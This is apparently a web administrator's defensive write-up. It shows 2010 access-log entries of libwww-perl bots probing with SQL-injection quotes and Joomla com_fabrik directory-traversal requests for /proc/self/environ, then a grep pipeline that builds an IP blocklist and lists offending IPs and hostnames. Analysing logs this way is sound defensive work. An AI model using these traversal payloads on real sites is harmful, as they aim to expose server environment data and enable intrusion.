"GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 77.243.239.121 - - [16/Aug/2010:12:41:05 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:06 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:36 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:38 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:43:40 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:43:41 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
One common thing for those record is the usage of libwww-perl. Greping on string libwww brings us more complete picture .
Extracting IP addresses gives you the first draft of the "blacklist" and that top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe which can be made into a function or shell script:
grep libwww $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty
Below are the results of processing of the list from above:
20 83.149.125.174 home.w-sieci.pl 18 80.67.20.21 mayermail.de 12 200.69.222.122 contactar01.gestionarnet.com 11 64.78.163.2 nickentgolf.com 11 62.193.224.166 wpc0230.amenworld.com 10 86.109.161.201 lincl239.ns1.couldix.com 9 87.230.2.113 lvps87-230-2-113.dedicated.hosteurope.de 9 85.214.55.73 mind-creations.net 7 193.192.249.157 6 87.118.96.254 ns.km22206-02.keymachine.de 6 72.55.153.108 ip-72-55-153-108.static.privatedns.com 6 66.147.239.104 host.1sbs.com 6 216.246.52.59 server.dynasoft.com.ph 6 213.195.77.225 225.77.195.213.ibercom.com 5 217.115.197.51 node11.cluster.nxs.nl
![]() |
![]() |
![]() |
109.86.145.204 213.189.224.16 cpanel2.bashnet.ru. 213.85.94.10 70.38.31.249 webfactorycorp.com. 194.225.62.108 nahad.tums.ac.ir. 94.199.48.178 directsun.hu. 92.53.100.197 67.227.157.101 host.mmjr.net.
![]() |
![]() |
![]() |
109.86.145.204 64.34.172.171 xeoline.com 70.86.235.162 ns5.btis.co.za 77.246.248.221 ns3.h20.ru
![]() |
![]() |
![]() |
85.255.199.38 hosted.by.hostbasket.com 93.187.141.50 93-187-141-50.profisol.ro 205.251.131.33 s10077.iwsservers.com
213.180.89.75 shwl-0002.s.ipeer.se 83.143.81.162 188.165.217.175 ns211908.ovh.net
217.113.61.155 www.yofej.hu 211.233.11.170 211.233.11.170 www.yofej.hu
72.249.108.140 willow.e3linux.com 95.168.174.31 ns2.safronov.biz 77.79.245.90 p25.progreso.pl
24.173.234.213 rrcs-24-173-234-213.sw.biz.rr.com 219.240.36.36: Non-existent domain 219.240.36.36 rrcs-24-173-234-213.sw.biz.rr.com
195.130.205.27 europrojects.org 216.14.125.163 server.yeshuasharvest.org 180.151.249.166
Scanning attempts for November, 2009